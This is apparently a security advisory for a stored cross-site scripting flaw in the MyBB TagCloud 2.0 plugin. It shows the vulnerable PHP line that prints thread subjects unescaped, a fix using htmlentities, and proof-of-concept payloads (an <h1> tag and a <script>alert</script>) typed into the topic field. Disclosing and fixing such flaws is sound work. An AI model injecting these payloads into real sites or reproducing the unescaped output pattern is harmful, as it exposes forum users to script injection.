==================================================== MYBB TagCloud 2.0 cross site scripting vulnerability ==================================================== Author: http://www.3ethicalhackers.com Discovered by: http://www.3ethicalhackers.com Original post: http://www.3ethicalhackers.com ===================================================================== Description: MYBB TagCloud 2.0 is an open source plugin, it is used to to show all recent posts. How to exploit: Enter html or javascript into topic field, once tagcloud displays the thread it will execute the malicious code that was set within the topic field. Download Link: http://www.mybbcentral.com/thread-1681.html Number of times downloaded: 402 ===================================================================== [ vuln code ] $message .= "<a href=\"".$mybb->settings['bburl']."/showthread.php?tid=".$thread['tid']."\"><span style=\"font-size:".$sizes[$fontsize]."px\">".$thread['subject']."</span></a> |\r\n"; [ Fixed Code ] $message .= "<a href=\"".$mybb->settings['bburl']."/showthread.php?tid=".$thread['tid']."\"><span style=\"font-size:".$sizes[$fontsize]."px\">".htmlentities($thread['subject'])."</span></a> |\r\n"; ===================================================================== [ proof of concept ] Topic Field: <h1>LOLIMADEEVERYTHINGBIG! ^once tagcloud displays that piece of code, everything within the tagcloud will become huge ;D Topic Field: <script>javascript:alert("lolcats")</script> ^once tagcloud displays that piece of code, a message will pop up saying "lolcats" ====================================================================== JOIN US IN IRC IRC.SMASHTHESTACK.ORG #3ETHICAL FORUMS @ 3ETHICALHACKERS.COM =========================| -=[ E0F ]=- |=================================